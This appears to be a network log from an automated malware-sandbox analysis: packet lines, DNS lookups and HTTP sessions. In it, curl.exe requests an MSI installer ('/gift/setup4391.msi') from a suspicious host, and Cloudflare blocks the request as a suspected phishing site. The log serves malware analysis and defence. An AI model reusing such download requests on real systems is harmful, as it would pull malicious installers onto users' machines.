                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:19.975296021 CET53449443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:20.284426928 CET62908443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:20.430608988 CET44353449172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:20.431272984 CET53449443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:20.432303905 CET44362908162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:20.432328939 CET44362908162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:20.432992935 CET44362908162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:20.433012962 CET44362908162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:20.433409929 CET62908443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:20.434922934 CET62908443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:20.434998035 CET62908443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:20.435286999 CET62908443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:20.435409069 CET62908443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:20.462753057 CET53449443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:20.528553963 CET44353449172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:20.528574944 CET44353449172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:20.528584957 CET44353449172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:20.528774977 CET44353449172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:20.528963089 CET53449443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:20.529046059 CET53449443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:20.532202959 CET44362908162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:20.532215118 CET44362908162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:20.532224894 CET44362908162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:20.532233000 CET44362908162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:20.532599926 CET62908443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:20.532669067 CET62908443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:20.532919884 CET44362908162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:20.534207106 CET44362908162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:20.534377098 CET44362908162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:20.534804106 CET62908443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:20.663058043 CET44353449172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:20.663490057 CET53449443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:20.664532900 CET44362908162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:20.696922064 CET62908443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:20.761797905 CET44353449172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:20.762860060 CET44353449172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:20.763335943 CET44353449172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:20.763518095 CET53449443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:00.187814951 CET138138192.168.2.6192.168.2.255
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:12.183666945 CET60361443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:12.183798075 CET60361443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:12.184051037 CET60361443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:12.184139967 CET60361443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:12.407902002 CET53555851.1.1.1192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:12.716094017 CET44360361172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:12.717875004 CET60361443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:12.747952938 CET60361443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:12.815478086 CET44360361172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:12.815496922 CET44360361172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:12.815506935 CET44360361172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:12.815515995 CET44360361172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:12.815987110 CET60361443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:12.816039085 CET60361443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:12.913094997 CET44360361172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:12.913520098 CET60361443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:13.013473988 CET44360361172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:13.013493061 CET44360361172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:13.013808012 CET44360361172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:13.017411947 CET60361443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:13.901578903 CET60361443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:13.901578903 CET60361443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:14.001485109 CET44360361172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:14.013150930 CET44360361172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:14.013165951 CET44360361172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:14.013600111 CET60361443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:51.968811989 CET6445253192.168.2.61.1.1.1
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:51.968977928 CET6294153192.168.2.61.1.1.1
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:51.975970984 CET53629411.1.1.1192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:51.976294994 CET53644521.1.1.1192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:51.977205992 CET49908443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:51.977335930 CET49908443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:51.977544069 CET49908443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:51.977641106 CET49908443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:52.385088921 CET49908443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:52.437402010 CET44349908172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:52.438122034 CET49908443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:52.463212967 CET49908443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:52.483177900 CET44349908172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:52.483195066 CET44349908172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:52.483205080 CET44349908172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:52.483210087 CET44349908172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:52.483757973 CET49908443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:52.483792067 CET49908443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:52.483835936 CET49908443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:52.483891010 CET49908443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:52.537055969 CET44349908172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:52.572578907 CET49908443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:52.581677914 CET44349908172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:52.582024097 CET49908443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:52.681190968 CET44349908172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:52.682311058 CET44349908172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:52.682638884 CET44349908172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:52.683002949 CET49908443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:13.732088089 CET192.168.2.61.1.1.1c2a2(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:03.378036976 CET192.168.2.61.1.1.10xd400Standard query (0)559236.na3.toA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:08.934250116 CET192.168.2.61.1.1.10x3b9aStandard query (0)s28.q4cdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:08.934431076 CET192.168.2.61.1.1.10xa5c9Standard query (0)s28.q4cdn.com65IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:12.468825102 CET192.168.2.61.1.1.10x9e96Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:12.469073057 CET192.168.2.61.1.1.10x5734Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:12.469371080 CET192.168.2.61.1.1.10x5794Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:12.469615936 CET192.168.2.61.1.1.10xfa75Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:12.499445915 CET192.168.2.61.1.1.10x1e4bStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:12.499849081 CET192.168.2.61.1.1.10x9e73Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:12.545586109 CET192.168.2.61.1.1.10xf4a4Standard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:12.545758963 CET192.168.2.61.1.1.10x7759Standard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:12.675025940 CET192.168.2.61.1.1.10x2f57Standard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:12.675198078 CET192.168.2.61.1.1.10xaab3Standard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:51.968811989 CET192.168.2.61.1.1.10x2359Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:51.968977928 CET192.168.2.61.1.1.10x7109Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:03.390443087 CET1.1.1.1192.168.2.60xd400No error (0)559236.na3.to188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:03.390443087 CET1.1.1.1192.168.2.60xd400No error (0)559236.na3.to188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:08.965178013 CET1.1.1.1192.168.2.60x3b9aNo error (0)s28.q4cdn.coms28clientfiles-1e4b.kxcdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:08.965178013 CET1.1.1.1192.168.2.60x3b9aNo error (0)s28clientfiles-1e4b.kxcdn.comp-defr00.kxcdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:08.965178013 CET1.1.1.1192.168.2.60x3b9aNo error (0)p-defr00.kxcdn.com185.172.148.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:08.965195894 CET1.1.1.1192.168.2.60xa5c9No error (0)s28.q4cdn.coms28clientfiles-1e4b.kxcdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:08.965195894 CET1.1.1.1192.168.2.60xa5c9No error (0)s28clientfiles-1e4b.kxcdn.comp-defr00.kxcdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:09.725460052 CET1.1.1.1192.168.2.60x4dc5No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:09.725970984 CET1.1.1.1192.168.2.60x7d25No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:09.725970984 CET1.1.1.1192.168.2.60x7d25No error (0)ssl.bingadsedgeextension-prod-europe.azurewebsites.net94.245.104.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:12.476507902 CET1.1.1.1192.168.2.60x9e96No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:12.476507902 CET1.1.1.1192.168.2.60x9e96No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:12.476752996 CET1.1.1.1192.168.2.60x5734No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:12.476763964 CET1.1.1.1192.168.2.60x5794No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:12.476763964 CET1.1.1.1192.168.2.60x5794No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:12.477230072 CET1.1.1.1192.168.2.60xfa75No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:12.506556034 CET1.1.1.1192.168.2.60x1e4bNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:12.506556034 CET1.1.1.1192.168.2.60x1e4bNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:12.508052111 CET1.1.1.1192.168.2.60x9e73No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:12.552663088 CET1.1.1.1192.168.2.60xf4a4No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:12.552663088 CET1.1.1.1192.168.2.60xf4a4No error (0)googlehosted.l.googleusercontent.com142.250.185.161A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:12.553546906 CET1.1.1.1192.168.2.60x7759No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:12.682665110 CET1.1.1.1192.168.2.60xaab3No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:12.682665110 CET1.1.1.1192.168.2.60xaab3No error (0)bzib.nelreports.net.akamaized.neta416.dscd.akamai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:12.683876991 CET1.1.1.1192.168.2.60x2f57No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:12.683876991 CET1.1.1.1192.168.2.60x2f57No error (0)bzib.nelreports.net.akamaized.neta416.dscd.akamai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:12.683876991 CET1.1.1.1192.168.2.60x2f57No error (0)a416.dscd.akamai.net2.22.242.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:12.683876991 CET1.1.1.1192.168.2.60x2f57No error (0)a416.dscd.akamai.net2.22.242.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:51.975970984 CET1.1.1.1192.168.2.60x7109No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:51.976294994 CET1.1.1.1192.168.2.60x2359No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:51.976294994 CET1.1.1.1192.168.2.60x2359No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            • s28.q4cdn.com
                                                                                                                                                                                                                                                            • chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                            • clients2.googleusercontent.com
                                                                                                                                                                                                                                                            • bzib.nelreports.net
                                                                                                                                                                                                                                                            • 559236.na3.to
                                                                                                                                                                                                                                                            • c.pki.goog
                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            0192.168.2.649689188.114.96.3806412C:\Windows\System32\curl.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:03.420008898 CET95OUTGET /gift/setup4391.msi HTTP/1.1
                                                                                                                                                                                                                                                            Host: 559236.na3.to
                                                                                                                                                                                                                                                            User-Agent: curl/7.83.1
                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:03.891622066 CET1236INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Date: Fri, 07 Mar 2025 20:40:03 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bk8D4yWya%2Fjc5IrEFAz%2Fp3eIVrswZsx1TQSQ8eGXyw81zSLyuWgJV4rIlEZ1avWrvHaaF8Be3JUY40BSpBHO8q8svSS8ln%2F2mWbmOtW0k1vzLVnw0yLGmja%2B2v4xGTb9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 91cce7dffed94217-EWR
                                                                                                                                                                                                                                                            Data Raw: 31 31 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 [TRUNCATED]
                                                                                                                                                                                                                                                            Data Ascii: 11d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:03.891638041 CET224INData Raw: 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 63 73 73 22 20 2f 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73
                                                                                                                                                                                                                                                            Data Ascii: _styles-css" href="/cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:03.891649008 CET1236INData Raw: 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65
                                                                                                                                                                                                                                                            Data Ascii: IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) }</script><!
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:03.891668081 CET224INData Raw: 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f
                                                                                                                                                                                                                                                            Data Ascii: > <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More<
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:03.891688108 CET1236INData Raw: 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63 67 69
                                                                                                                                                                                                                                                            Data Ascii: /a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="AgMO0ufWWrqeV7iwa74v9K1X9M4pbA99JeG_rHbo1Gc-17413
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:03.891699076 CET975INData Raw: 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 73 70 61 6e 3e 0a 20
                                                                                                                                                                                                                                                            Data Ascii: reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by<


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                            1192.168.2.649744142.250.181.22780
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:42.256373882 CET202OUTGET /r/gsr1.crl HTTP/1.1
                                                                                                                                                                                                                                                            Cache-Control: max-age = 3000
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                            If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMT
                                                                                                                                                                                                                                                            User-Agent: Microsoft-CryptoAPI/10.0
                                                                                                                                                                                                                                                            Host: c.pki.goog
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:42.893840075 CET223INHTTP/1.1 304 Not Modified
                                                                                                                                                                                                                                                            Date: Fri, 07 Mar 2025 20:09:15 GMT
                                                                                                                                                                                                                                                            Expires: Fri, 07 Mar 2025 20:59:15 GMT
                                                                                                                                                                                                                                                            Age: 1887
                                                                                                                                                                                                                                                            Last-Modified: Tue, 07 Jan 2025 07:28:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: public, max-age=3000
                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:42.901551962 CET200OUTGET /r/r4.crl HTTP/1.1
                                                                                                                                                                                                                                                            Cache-Control: max-age = 3000
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                            If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT
                                                                                                                                                                                                                                                            User-Agent: Microsoft-CryptoAPI/10.0
                                                                                                                                                                                                                                                            Host: c.pki.goog
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:43.087176085 CET223INHTTP/1.1 304 Not Modified
                                                                                                                                                                                                                                                            Date: Fri, 07 Mar 2025 20:09:17 GMT
                                                                                                                                                                                                                                                            Expires: Fri, 07 Mar 2025 20:59:17 GMT
                                                                                                                                                                                                                                                            Age: 1885
